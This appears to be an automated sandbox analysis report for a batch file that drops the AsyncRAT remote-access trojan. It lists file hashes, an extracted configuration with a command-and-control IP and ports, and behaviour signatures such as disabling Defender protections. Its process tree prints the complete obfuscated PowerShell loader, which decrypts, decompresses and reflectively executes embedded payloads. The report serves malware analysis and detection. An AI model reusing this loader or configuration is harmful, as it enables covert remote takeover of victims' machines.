Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
136s -
max time network
105s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
-
submitted
07/05/2024, 01:23
General
-
Target
ASyncRemover.bat
-
Size
63KB
-
MD5
e9319ac7284b6bbadf0200fee286b6c1
-
SHA1
51c30382aa103118937f1a9bf453a8345febafb4
-
SHA256
09d4308c18ecece489a51b7837968bcfc6c1273d83f5c83614bbdd119ccf6961
-
SHA512
73e349b61c285cdb3cfdf41ae9ba166cc0f8e5c7b989bf744f9aa8433baf41ea3a01b46fa9a88cc97fa4ca5d80f57a9dbd8fea631a164566c9e95632c9f3404b
-
SSDEEP
1536:Z6e+aDqc6V/xOtoqfF4OycI/k0xqAD/xtM:Z6aDqpVuoqKL5fkAvM
Malware Config
Extracted
asyncrat
0.5.8
RATED
147.185.221.17:25565
147.185.221.17:37531
Dudee4vQEqBD
-
delay
3
-
install
false
-
install_file
AnticheatBiner.exe
-
install_folder
%AppData%
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Detect ZGRat V1 5 IoCs
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
ZGRat
ZGRat is remote access trojan written in C#.
-
Async RAT payload 1 IoCs
-
Blocklisted process makes network request 7 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Delays execution with timeout.exe 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 23 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ASyncRemover.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rQsZbBPOPJCvxNhL0LUES/xBoGdJPo5xjQuRz/WAY2Y='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DjbA3otpI3NZoCoqJZkIpQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XrWyO=New-Object System.IO.MemoryStream(,$param_var); $udTvC=New-Object System.IO.MemoryStream; $DGCBl=New-Object System.IO.Compression.GZipStream($XrWyO, [IO.Compression.CompressionMode]::Decompress); $DGCBl.CopyTo($udTvC); $DGCBl.Dispose(); $XrWyO.Dispose(); $udTvC.Dispose(); $udTvC.ToArray();}function execute_function($param_var,$param2_var){ $ILwNn=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XDsjo=$ILwNn.EntryPoint; $XDsjo.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ASyncRemover.bat';$AUAcT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ASyncRemover.bat').Split([Environment]::NewLine);foreach ($RmJpd in $AUAcT) { if ($RmJpd.StartsWith(':: ')) { $jmZjY=$RmJpd.Substring(3); break; }}$payloads_var=[string[]]$jmZjY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Modifies Windows Defender Real-time Protection settings
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp74BE.tmp.bat""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
Filesize
20KB
MD588b26af51bf2ae195c37b2d50159e560
SHA16319680f68f582c7b6da22b6818559bbb5535cf5
SHA25604735372c4ad7956f7e12b8b30679093f092d659fbed55a2e0b41238ff2c613b
SHA51203f5eebc18ff6a46c62a2162e8a8631b9b296ee8561b0c4333e2ed7bf1e14a1b85eb80a7cc63647bb7eacd9bdd7b1d0779463c63bb2b89681d3baa5d4cfa51fa
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
171B
MD5c486d85db14f5d298df6a1addc2d3de9
SHA10e941f64a37ec3aa2c99b1f5e36744fad89fc6c3
SHA256a2afd2d74b9c6067469c9bc4d0d2f65c22caa3c67e78dd663d39b1c92965439e
SHA51254cbc6b74575ed2fe0575e2e219e0677b01c4a54e11d3b80523bcef4a53c89f21c5b2751ea09ec44c3aff4fc85d924b4513d569d0e117d97c9f992f459063e23
-
Filesize
104KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
32KB
-
Filesize
80KB
-
Filesize
56KB
-
Filesize
304KB
-
Filesize
600KB
-
Filesize
40KB
-
Filesize
652KB
-
Filesize
7.7MB
-
Filesize
200KB
-
Filesize
7.7MB
-
Filesize
120KB
-
Filesize
68KB
-
Filesize
7.7MB
-
Filesize
624KB
-
Filesize
304KB
-
Filesize
120KB
-
Filesize
472KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
408KB
-
Filesize
7.7MB
-
Filesize
4KB
-
Filesize
5.6MB
-
Filesize
72KB
-
Filesize
56KB
-
Filesize
32KB
-
Filesize
104KB
-
Filesize
6.5MB
-
Filesize
400KB
-
Filesize
120KB
-
Filesize
3.3MB
-
Filesize
4KB
-
Filesize
136KB
-
Filesize
408KB
-
Filesize
416KB
-
Filesize
584KB
-
Filesize
416KB
-
Filesize
584KB
-
Filesize
7.7MB
-
Filesize
400KB
-
Filesize
6.2MB
-
Filesize
7.7MB
-
Filesize
216KB
-
Filesize
7.7MB